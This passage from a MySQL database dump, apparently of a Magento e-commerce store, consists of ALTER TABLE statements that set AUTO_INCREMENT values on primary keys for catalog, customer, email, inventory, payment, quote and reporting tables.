  MODIFY `option_title_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Option Title ID';

--
-- AUTO_INCREMENT for table `catalog_product_option_type_price`
--
ALTER TABLE `catalog_product_option_type_price`
  MODIFY `option_type_price_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Option Type Price ID';

--
-- AUTO_INCREMENT for table `catalog_product_option_type_title`
--
ALTER TABLE `catalog_product_option_type_title`
  MODIFY `option_type_title_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Option Type Title ID';

--
-- AUTO_INCREMENT for table `catalog_product_option_type_value`
--
ALTER TABLE `catalog_product_option_type_value`
  MODIFY `option_type_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Option Type ID';

--
-- AUTO_INCREMENT for table `catalog_product_super_attribute`
--
ALTER TABLE `catalog_product_super_attribute`
  MODIFY `product_super_attribute_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Product Super Attribute ID', AUTO_INCREMENT=296;

--
-- AUTO_INCREMENT for table `catalog_product_super_attribute_label`
--
ALTER TABLE `catalog_product_super_attribute_label`
  MODIFY `value_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Value ID', AUTO_INCREMENT=295;

--
-- AUTO_INCREMENT for table `catalog_product_super_link`
--
ALTER TABLE `catalog_product_super_link`
  MODIFY `link_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Link ID', AUTO_INCREMENT=2100;

--
-- AUTO_INCREMENT for table `checkout_agreement`
--
ALTER TABLE `checkout_agreement`
  MODIFY `agreement_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Agreement ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `cms_block`
--
ALTER TABLE `cms_block`
  MODIFY `block_id` smallint(6) NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=33;

--
-- AUTO_INCREMENT for table `cms_page`
--
ALTER TABLE `cms_page`
  MODIFY `page_id` smallint(6) NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=7;

--
-- AUTO_INCREMENT for table `core_config_data`
--
ALTER TABLE `core_config_data`
  MODIFY `config_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Config ID', AUTO_INCREMENT=277;

--
-- AUTO_INCREMENT for table `cron_schedule`
--
ALTER TABLE `cron_schedule`
  MODIFY `schedule_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Schedule ID';

--
-- AUTO_INCREMENT for table `customer_address_entity`
--
ALTER TABLE `customer_address_entity`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=292;

--
-- AUTO_INCREMENT for table `customer_address_entity_datetime`
--
ALTER TABLE `customer_address_entity_datetime`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `customer_address_entity_decimal`
--
ALTER TABLE `customer_address_entity_decimal`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `customer_address_entity_int`
--
ALTER TABLE `customer_address_entity_int`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `customer_address_entity_text`
--
ALTER TABLE `customer_address_entity_text`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `customer_address_entity_varchar`
--
ALTER TABLE `customer_address_entity_varchar`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `customer_entity`
--
ALTER TABLE `customer_entity`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=141;

--
-- AUTO_INCREMENT for table `customer_entity_datetime`
--
ALTER TABLE `customer_entity_datetime`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `customer_entity_decimal`
--
ALTER TABLE `customer_entity_decimal`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `customer_entity_int`
--
ALTER TABLE `customer_entity_int`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `customer_entity_text`
--
ALTER TABLE `customer_entity_text`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `customer_entity_varchar`
--
ALTER TABLE `customer_entity_varchar`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `customer_group`
--
ALTER TABLE `customer_group`
  MODIFY `customer_group_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `customer_log`
--
ALTER TABLE `customer_log`
  MODIFY `log_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Log ID', AUTO_INCREMENT=194;

--
-- AUTO_INCREMENT for table `customer_visitor`
--
ALTER TABLE `customer_visitor`
  MODIFY `visitor_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Visitor ID', AUTO_INCREMENT=9913;

--
-- AUTO_INCREMENT for table `design_change`
--
ALTER TABLE `design_change`
  MODIFY `design_change_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Design Change ID';

--
-- AUTO_INCREMENT for table `directory_country_format`
--
ALTER TABLE `directory_country_format`
  MODIFY `country_format_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Country Format ID';

--
-- AUTO_INCREMENT for table `directory_country_region`
--
ALTER TABLE `directory_country_region`
  MODIFY `region_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Region ID', AUTO_INCREMENT=702;

--
-- AUTO_INCREMENT for table `downloadable_link`
--
ALTER TABLE `downloadable_link`
  MODIFY `link_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Link ID';

--
-- AUTO_INCREMENT for table `downloadable_link_price`
--
ALTER TABLE `downloadable_link_price`
  MODIFY `price_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Price ID';

--
-- AUTO_INCREMENT for table `downloadable_link_purchased`
--
ALTER TABLE `downloadable_link_purchased`
  MODIFY `purchased_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Purchased ID';

--
-- AUTO_INCREMENT for table `downloadable_link_purchased_item`
--
ALTER TABLE `downloadable_link_purchased_item`
  MODIFY `item_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Item ID';

--
-- AUTO_INCREMENT for table `downloadable_link_title`
--
ALTER TABLE `downloadable_link_title`
  MODIFY `title_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Title ID';

--
-- AUTO_INCREMENT for table `downloadable_sample`
--
ALTER TABLE `downloadable_sample`
  MODIFY `sample_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Sample ID';

--
-- AUTO_INCREMENT for table `downloadable_sample_title`
--
ALTER TABLE `downloadable_sample_title`
  MODIFY `title_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Title ID';

--
-- AUTO_INCREMENT for table `eav_attribute`
--
ALTER TABLE `eav_attribute`
  MODIFY `attribute_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Attribute ID', AUTO_INCREMENT=158;

--
-- AUTO_INCREMENT for table `eav_attribute_group`
--
ALTER TABLE `eav_attribute_group`
  MODIFY `attribute_group_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Attribute Group ID', AUTO_INCREMENT=91;

--
-- AUTO_INCREMENT for table `eav_attribute_label`
--
ALTER TABLE `eav_attribute_label`
  MODIFY `attribute_label_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Attribute Label ID', AUTO_INCREMENT=18;

--
-- AUTO_INCREMENT for table `eav_attribute_option`
--
ALTER TABLE `eav_attribute_option`
  MODIFY `option_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Option ID', AUTO_INCREMENT=5639;

--
-- AUTO_INCREMENT for table `eav_attribute_option_swatch`
--
ALTER TABLE `eav_attribute_option_swatch`
  MODIFY `swatch_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Swatch ID', AUTO_INCREMENT=53;

--
-- AUTO_INCREMENT for table `eav_attribute_option_value`
--
ALTER TABLE `eav_attribute_option_value`
  MODIFY `value_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Value ID', AUTO_INCREMENT=5666;

--
-- AUTO_INCREMENT for table `eav_attribute_set`
--
ALTER TABLE `eav_attribute_set`
  MODIFY `attribute_set_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Attribute Set ID', AUTO_INCREMENT=16;

--
-- AUTO_INCREMENT for table `eav_entity`
--
ALTER TABLE `eav_entity`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `eav_entity_attribute`
--
ALTER TABLE `eav_entity_attribute`
  MODIFY `entity_attribute_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity Attribute ID', AUTO_INCREMENT=684;

--
-- AUTO_INCREMENT for table `eav_entity_datetime`
--
ALTER TABLE `eav_entity_datetime`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `eav_entity_decimal`
--
ALTER TABLE `eav_entity_decimal`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `eav_entity_int`
--
ALTER TABLE `eav_entity_int`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `eav_entity_store`
--
ALTER TABLE `eav_entity_store`
  MODIFY `entity_store_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity Store ID';

--
-- AUTO_INCREMENT for table `eav_entity_text`
--
ALTER TABLE `eav_entity_text`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `eav_entity_type`
--
ALTER TABLE `eav_entity_type`
  MODIFY `entity_type_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity Type ID', AUTO_INCREMENT=9;

--
-- AUTO_INCREMENT for table `eav_entity_varchar`
--
ALTER TABLE `eav_entity_varchar`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `eav_form_element`
--
ALTER TABLE `eav_form_element`
  MODIFY `element_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Element ID', AUTO_INCREMENT=43;

--
-- AUTO_INCREMENT for table `eav_form_fieldset`
--
ALTER TABLE `eav_form_fieldset`
  MODIFY `fieldset_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Fieldset ID';

--
-- AUTO_INCREMENT for table `eav_form_type`
--
ALTER TABLE `eav_form_type`
  MODIFY `type_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Type ID', AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `email_abandoned_cart`
--
ALTER TABLE `email_abandoned_cart`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key';

--
-- AUTO_INCREMENT for table `email_automation`
--
ALTER TABLE `email_automation`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key';

--
-- AUTO_INCREMENT for table `email_campaign`
--
ALTER TABLE `email_campaign`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key';

--
-- AUTO_INCREMENT for table `email_catalog`
--
ALTER TABLE `email_catalog`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key', AUTO_INCREMENT=2060;

--
-- AUTO_INCREMENT for table `email_contact`
--
ALTER TABLE `email_contact`
  MODIFY `email_contact_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `email_contact_consent`
--
ALTER TABLE `email_contact_consent`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key';

--
-- AUTO_INCREMENT for table `email_coupon_attribute`
--
ALTER TABLE `email_coupon_attribute`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key';

--
-- AUTO_INCREMENT for table `email_failed_auth`
--
ALTER TABLE `email_failed_auth`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key';

--
-- AUTO_INCREMENT for table `email_importer`
--
ALTER TABLE `email_importer`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key';

--
-- AUTO_INCREMENT for table `email_order`
--
ALTER TABLE `email_order`
  MODIFY `email_order_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key';

--
-- AUTO_INCREMENT for table `email_review`
--
ALTER TABLE `email_review`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `email_rules`
--
ALTER TABLE `email_rules`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key';

--
-- AUTO_INCREMENT for table `email_template`
--
ALTER TABLE `email_template`
  MODIFY `template_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Template ID';

--
-- AUTO_INCREMENT for table `email_wishlist`
--
ALTER TABLE `email_wishlist`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key';

--
-- AUTO_INCREMENT for table `flag`
--
ALTER TABLE `flag`
  MODIFY `flag_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Flag Id', AUTO_INCREMENT=10;

--
-- AUTO_INCREMENT for table `gift_message`
--
ALTER TABLE `gift_message`
  MODIFY `gift_message_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'GiftMessage ID';

--
-- AUTO_INCREMENT for table `googleoptimizer_code`
--
ALTER TABLE `googleoptimizer_code`
  MODIFY `code_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Google experiment code ID';

--
-- AUTO_INCREMENT for table `importexport_importdata`
--
ALTER TABLE `importexport_importdata`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=21;

--
-- AUTO_INCREMENT for table `import_history`
--
ALTER TABLE `import_history`
  MODIFY `history_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'History record ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `indexer_state`
--
ALTER TABLE `indexer_state`
  MODIFY `state_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Indexer State ID', AUTO_INCREMENT=14;

--
-- AUTO_INCREMENT for table `integration`
--
ALTER TABLE `integration`
  MODIFY `integration_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Integration ID';

--
-- AUTO_INCREMENT for table `inventory_reservation`
--
ALTER TABLE `inventory_reservation`
  MODIFY `reservation_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `inventory_source_carrier_link`
--
ALTER TABLE `inventory_source_carrier_link`
  MODIFY `link_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `inventory_source_item`
--
ALTER TABLE `inventory_source_item`
  MODIFY `source_item_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2105;

--
-- AUTO_INCREMENT for table `inventory_source_stock_link`
--
ALTER TABLE `inventory_source_stock_link`
  MODIFY `link_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `inventory_stock`
--
ALTER TABLE `inventory_stock`
  MODIFY `stock_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `klarna_core_order`
--
ALTER TABLE `klarna_core_order`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity Id';

--
-- AUTO_INCREMENT for table `klarna_payments_quote`
--
ALTER TABLE `klarna_payments_quote`
  MODIFY `payments_quote_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Payments Id';

--
-- AUTO_INCREMENT for table `layout_link`
--
ALTER TABLE `layout_link`
  MODIFY `layout_link_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Link ID', AUTO_INCREMENT=27;

--
-- AUTO_INCREMENT for table `layout_update`
--
ALTER TABLE `layout_update`
  MODIFY `layout_update_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Layout Update ID', AUTO_INCREMENT=27;

--
-- AUTO_INCREMENT for table `magento_acknowledged_bulk`
--
ALTER TABLE `magento_acknowledged_bulk`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Internal ID';

--
-- AUTO_INCREMENT for table `magento_bulk`
--
ALTER TABLE `magento_bulk`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Bulk Internal ID (must not be exposed)';

--
-- AUTO_INCREMENT for table `magento_operation`
--
ALTER TABLE `magento_operation`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Operation ID';

--
-- AUTO_INCREMENT for table `mageplaza_bannerslider_banner`
--
ALTER TABLE `mageplaza_bannerslider_banner`
  MODIFY `banner_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Banner ID', AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `mageplaza_bannerslider_slider`
--
ALTER TABLE `mageplaza_bannerslider_slider`
  MODIFY `slider_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Slider ID', AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `media_gallery_asset`
--
ALTER TABLE `media_gallery_asset`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `media_gallery_keyword`
--
ALTER TABLE `media_gallery_keyword`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Keyword ID';

--
-- AUTO_INCREMENT for table `msp_tfa_country_codes`
--
ALTER TABLE `msp_tfa_country_codes`
  MODIFY `msp_tfa_country_codes_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'TFA admin user ID', AUTO_INCREMENT=242;

--
-- AUTO_INCREMENT for table `msp_tfa_trusted`
--
ALTER TABLE `msp_tfa_trusted`
  MODIFY `msp_tfa_trusted_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Trusted device ID';

--
-- AUTO_INCREMENT for table `msp_tfa_user_config`
--
ALTER TABLE `msp_tfa_user_config`
  MODIFY `msp_tfa_user_config_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'TFA admin user ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `mview_state`
--
ALTER TABLE `mview_state`
  MODIFY `state_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'View State ID', AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `newsletter_problem`
--
ALTER TABLE `newsletter_problem`
  MODIFY `problem_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Problem ID';

--
-- AUTO_INCREMENT for table `newsletter_queue`
--
ALTER TABLE `newsletter_queue`
  MODIFY `queue_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Queue ID';

--
-- AUTO_INCREMENT for table `newsletter_queue_link`
--
ALTER TABLE `newsletter_queue_link`
  MODIFY `queue_link_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Queue Link ID';

--
-- AUTO_INCREMENT for table `newsletter_subscriber`
--
ALTER TABLE `newsletter_subscriber`
  MODIFY `subscriber_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Subscriber ID', AUTO_INCREMENT=99;

--
-- AUTO_INCREMENT for table `newsletter_template`
--
ALTER TABLE `newsletter_template`
  MODIFY `template_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Template ID';

--
-- AUTO_INCREMENT for table `oauth_consumer`
--
ALTER TABLE `oauth_consumer`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `oauth_token`
--
ALTER TABLE `oauth_token`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=26;

--
-- AUTO_INCREMENT for table `oauth_token_request_log`
--
ALTER TABLE `oauth_token_request_log`
  MODIFY `log_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Log ID', AUTO_INCREMENT=60;

--
-- AUTO_INCREMENT for table `password_reset_request_event`
--
ALTER TABLE `password_reset_request_event`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `patch_list`
--
ALTER TABLE `patch_list`
  MODIFY `patch_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Patch Auto Increment', AUTO_INCREMENT=155;

--
-- AUTO_INCREMENT for table `paypal_billing_agreement`
--
ALTER TABLE `paypal_billing_agreement`
  MODIFY `agreement_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Agreement ID';

--
-- AUTO_INCREMENT for table `paypal_cert`
--
ALTER TABLE `paypal_cert`
  MODIFY `cert_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Cert ID';

--
-- AUTO_INCREMENT for table `paypal_payment_transaction`
--
ALTER TABLE `paypal_payment_transaction`
  MODIFY `transaction_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `paypal_settlement_report`
--
ALTER TABLE `paypal_settlement_report`
  MODIFY `report_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Report ID';

--
-- AUTO_INCREMENT for table `paypal_settlement_report_row`
--
ALTER TABLE `paypal_settlement_report_row`
  MODIFY `row_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Row ID';

--
-- AUTO_INCREMENT for table `persistent_session`
--
ALTER TABLE `persistent_session`
  MODIFY `persistent_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Session ID';

--
-- AUTO_INCREMENT for table `product_alert_price`
--
ALTER TABLE `product_alert_price`
  MODIFY `alert_price_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Product alert price ID';

--
-- AUTO_INCREMENT for table `product_alert_stock`
--
ALTER TABLE `product_alert_stock`
  MODIFY `alert_stock_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Product alert stock ID';

--
-- AUTO_INCREMENT for table `queue`
--
ALTER TABLE `queue`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Queue ID', AUTO_INCREMENT=10;

--
-- AUTO_INCREMENT for table `queue_lock`
--
ALTER TABLE `queue_lock`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Message ID';

--
-- AUTO_INCREMENT for table `queue_message`
--
ALTER TABLE `queue_message`
  MODIFY `id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Message ID';

--
-- AUTO_INCREMENT for table `queue_message_status`
--
ALTER TABLE `queue_message_status`
  MODIFY `id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Relation ID';

--
-- AUTO_INCREMENT for table `quote`
--
ALTER TABLE `quote`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=1304;

--
-- AUTO_INCREMENT for table `quote_address`
--
ALTER TABLE `quote_address`
  MODIFY `address_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Address ID', AUTO_INCREMENT=2241;

--
-- AUTO_INCREMENT for table `quote_address_item`
--
ALTER TABLE `quote_address_item`
  MODIFY `address_item_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Address Item ID';

--
-- AUTO_INCREMENT for table `quote_id_mask`
--
ALTER TABLE `quote_id_mask`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=971;

--
-- AUTO_INCREMENT for table `quote_item`
--
ALTER TABLE `quote_item`
  MODIFY `item_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Item ID', AUTO_INCREMENT=497;

--
-- AUTO_INCREMENT for table `quote_item_option`
--
ALTER TABLE `quote_item_option`
  MODIFY `option_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Option ID', AUTO_INCREMENT=509;

--
-- AUTO_INCREMENT for table `quote_payment`
--
ALTER TABLE `quote_payment`
  MODIFY `payment_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Payment ID', AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `quote_shipping_rate`
--
ALTER TABLE `quote_shipping_rate`
  MODIFY `rate_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Rate ID', AUTO_INCREMENT=111;

--
-- AUTO_INCREMENT for table `rating`
--
ALTER TABLE `rating`
  MODIFY `rating_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Rating ID', AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `rating_entity`
--
ALTER TABLE `rating_entity`
  MODIFY `entity_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `rating_option`
--
ALTER TABLE `rating_option`
  MODIFY `option_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Rating Option ID', AUTO_INCREMENT=21;

--
-- AUTO_INCREMENT for table `rating_option_vote`
--
ALTER TABLE `rating_option_vote`
  MODIFY `vote_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Vote ID', AUTO_INCREMENT=514;

--
-- AUTO_INCREMENT for table `rating_option_vote_aggregated`
--
ALTER TABLE `rating_option_vote_aggregated`
  MODIFY `primary_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Vote aggregation ID', AUTO_INCREMENT=247;

--
-- AUTO_INCREMENT for table `release_notification_viewer_log`
--
ALTER TABLE `release_notification_viewer_log`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Log ID';

--
-- AUTO_INCREMENT for table `reporting_counts`
--
ALTER TABLE `reporting_counts`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `reporting_module_status`
--
ALTER TABLE `reporting_module_status`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Module ID';

--
-- AUTO_INCREMENT for table `reporting_orders`
--
ALTER TABLE `reporting_orders`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `reporting_system_updates`
--
ALTER TABLE `reporting_system_updates`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `reporting_users`
--
ALTER TABLE `reporting_users`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `report_compared_product_index`
--
ALTER TABLE `report_compared_product_index`
  MODIFY `index_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Index ID', AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `report_event`
--
ALTER TABLE `report_event`
  MODIFY `event_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Event ID', AUTO_INCREMENT=30184;

--
-- AUTO_INCREMENT for table `report_event_types`
--
ALTER TABLE `report_event_types`
  MODIFY `event_type_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Event Type ID', AUTO_INCREMENT=7;

--
-- AUTO_INCREMENT for table `report_viewed_product_aggregated_daily`
--
ALTER TABLE `report_viewed_product_aggregated_daily`
